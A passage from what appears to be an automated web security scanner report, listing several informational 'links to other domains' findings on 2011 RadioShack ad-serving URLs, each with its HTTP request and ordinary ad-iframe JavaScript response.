Date: Sat, 29 Jan 2011 00:26:36 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3198
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=96618366=_4d435ebd,0063835233,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=96618366/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1419206302/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1419206302?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>
\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=96618366=_4d435ebd,0063835233,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=96618366/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1419206302/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1419206302?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=96618366=_4d435ebd,0063835233,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=96618366/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1419206302/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1419206302?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1419206302?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.98. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10085444835@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10085444835@x90

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10085444835@x90?http://r1-ads.ace.advertising.com/click/site=0000753541/mnum=0000950190/cstr=59127172=_4d433bca,0085444835,753541^950190^81^0,1_/xsxdata=$XSXDATA/bnum=59127172/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:00 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3183
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2645525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000753541/mnum=0000950190/cstr=59127172=_4d433bca,0085444835,753541_950190_81_0,1_/xsxdata=$XSXDATA/bnum=59127172/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/835359449/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=835359449?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>
\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000753541/mnum=0000950190/cstr=59127172=_4d433bca,0085444835,753541_950190_81_0,1_/xsxdata=$XSXDATA/bnum=59127172/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/835359449/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=835359449?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000753541/mnum=0000950190/cstr=59127172=_4d433bca,0085444835,753541_950190_81_0,1_/xsxdata=$XSXDATA/bnum=59127172/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/835359449/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=835359449?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=835359449?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.99. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10085444835@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10085444835@x90

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10085444835@x90?http://r1-ads.ace.advertising.com/click/site=0000753541/mnum=0000950190/cstr=59127172=_4d433bca,0085444835,753541^950190^81^0,1_/xsxdata=$XSXDATA/bnum=59127172/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:30 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3192
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000753541/mnum=0000950190/cstr=59127172=_4d433bca,0085444835,753541_950190_81_0,1_/xsxdata=$XSXDATA/bnum=59127172/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1687741401/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1687741401?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>
\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000753541/mnum=0000950190/cstr=59127172=_4d433bca,0085444835,753541_950190_81_0,1_/xsxdata=$XSXDATA/bnum=59127172/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1687741401/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1687741401?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000753541/mnum=0000950190/cstr=59127172=_4d433bca,0085444835,753541_950190_81_0,1_/xsxdata=$XSXDATA/bnum=59127172/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1687741401/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1687741401?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1687741401?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.100. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10105242535@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10105242535@x90

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10105242535@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=51370141=_4d436570,0105242535,766159^950193^1183^0,1_/xsxdata=$XSXDATA/bnum=51370141/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660; session=1296256112|1296262268

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:01 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3198
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=51370141=_4d436570,0105242535,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=51370141/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1421913197/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1421913197?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>
\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=51370141=_4d436570,0105242535,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=51370141/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1421913197/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1421913197?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=51370141=_4d436570,0105242535,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=51370141/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1421913197/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1421913197?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1421913197?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.101. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10105242535@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10105242535@x90

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10105242535@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=51370141=_4d436570,0105242535,766159^950193^1183^0,1_/xsxdata=$XSXDATA/bnum=51370141/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660; session=1296256112|1296262268

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 00:55:12 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3198
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=51370141=_4d436570,0105242535,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=51370141/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/2000985820/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=2000985820?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>
\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=51370141=_4d436570,0105242535,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=51370141/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/2000985820/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=2000985820?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=51370141=_4d436570,0105242535,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=51370141/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/2000985820/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=2000985820?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=2000985820?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.102. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10465427522@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10465427522@x90

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10465427522@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=32985151=_4d437fb0,0465427522,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=32985151/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660; session=1296256112|1296268925

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:47:19 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3198
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=32985151=_4d437fb0,0465427522,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=32985151/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/2145795389/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=2145795389?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>
\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=32985151=_4d437fb0,0465427522,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=32985151/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/2145795389/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=2145795389?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=32985151=_4d437fb0,0465427522,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=32985151/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/2145795389/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=2145795389?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=2145795389?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.103. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10582313713@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10582313713@x90

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10582313713@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=48780829=_4d438665,0582313713,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=48780829/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660; session=1296256112|1296270656

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:16:00 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3189
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=48780829=_4d438665,0582313713,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=48780829/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/845536281/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=845536281?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>
\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=48780829=_4d438665,0582313713,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=48780829/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/845536281/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=845536281?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=48780829=_4d438665,0582313713,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=48780829/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/845536281/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=845536281?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=845536281?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.104. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12477363337@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
